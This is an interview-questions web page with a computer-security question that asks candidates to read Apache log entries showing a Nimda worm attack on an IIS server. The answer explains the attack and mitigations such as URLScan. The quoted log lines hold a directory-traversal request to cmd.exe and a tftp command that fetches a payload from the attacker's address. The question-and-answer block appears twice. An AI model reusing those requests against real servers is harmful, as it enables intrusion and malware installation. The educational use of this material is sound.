Interview Questions Answers.ORG
Interviewer And Interviewee Guide
Interviews
Quizzes
Home
Quizzes
Interviews Basic Job Interviews:AbilitiesAbroad JobsActivistAmbitionAnalyticalAptitudeAptitude KnowledgeAssertivenessAuthority / DecisivenessBasic CommonBasic Salary RequirementsBehavioralBehavioral BasedBody LanguageBusiness intelligenceCandidate Selection CriteriaCareer StatementsCareers FutureCaseCitizenshipCommunication SkillsComputer BasicsComputer securityConfidence BuildingConflictCorporate CommunicationCreativeCreativityCurrent Affairs 2009Current Affairs 2010Current Affairs 2011Dangerous JobsDecision MakingDetail SkillsDeterminationDifficultDream JobEmployers To AskEntry LevelEthicsExitFace to FaceFailuresFlexibilityFollow UpFrequently AskedFreshers GraduateFunnyFunny QuotesFuture Career PlanningGeneral KnowledgeGeneral SkillsGood EmployeeGood LeaderGraduationGroupGroup DiscussionsHackingHandle StressHard WorkerHotel TourismHow to AnswerIllegalIncidentInitiativeInitiative WorkplaceInteresting CareerInterestsJobJob AttireJob AwarenessJob DemotionJob Follow Up LetterJob KnowledgeJob PerformanceJob ProtocolJob Search TacticsJob TipsJudgmentLearning SkillsLinkedIn RecommendationListening SkillsLogicalMannersMental AttitudeMid LifeMost Inspiring JobsMotivationNegotiate Pay RaiseNegotiation SkillsNo ExperienceNo Work ExperiencePanelPart Time ContractPatiencePay PackagePersonalPersonality TraitsPhonePlacement AssistancePost GraduatePotential EmployeePresent JobProblem SolvingProblem Solving SkillsProhibitedProjectsPuzzlesQuality On TimeQuantitativeQuantitative AptitudeRecession Proof JobReferencesResignationResume FormatResume HelpResume ObjectivesResume Skill SetSalarySalary NegotiationSecond InterviewSecond RoundSecretarySelf AssessmentSelf WorthinessSituationalSkypeStatics ProbabilityStrange JobsTargeted SelectionTeamworkTeamwork MotivationTechnology SkillsTeenTelephone OperatorTelephonicToughTraining AdviceTrickyTypicalUnusualVideoVisaWarm UpWeaknesses and StrengthsWork EthicsWork HistoryWorkplace FlexibilityWritten Skills
Copyright © 2018. All Rights Reserved
Computer security Interview Question:
Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened?
Submitted by: AdministratorImagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:httpodbc.dll HTTP/1.0" 200 566 "-" "-"
Note: Goal of question - To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft's Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
Submitted by: Administrator
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:httpodbc.dll HTTP/1.0" 200 566 "-" "-"
Note: Goal of question - To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft's Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
Submitted by: Administrator
Copyright 2007-2024 by Interview Questions Answers .ORG All Rights Reserved.
https://InterviewQuestionsAnswers.ORG.
https://InterviewQuestionsAnswers.ORG.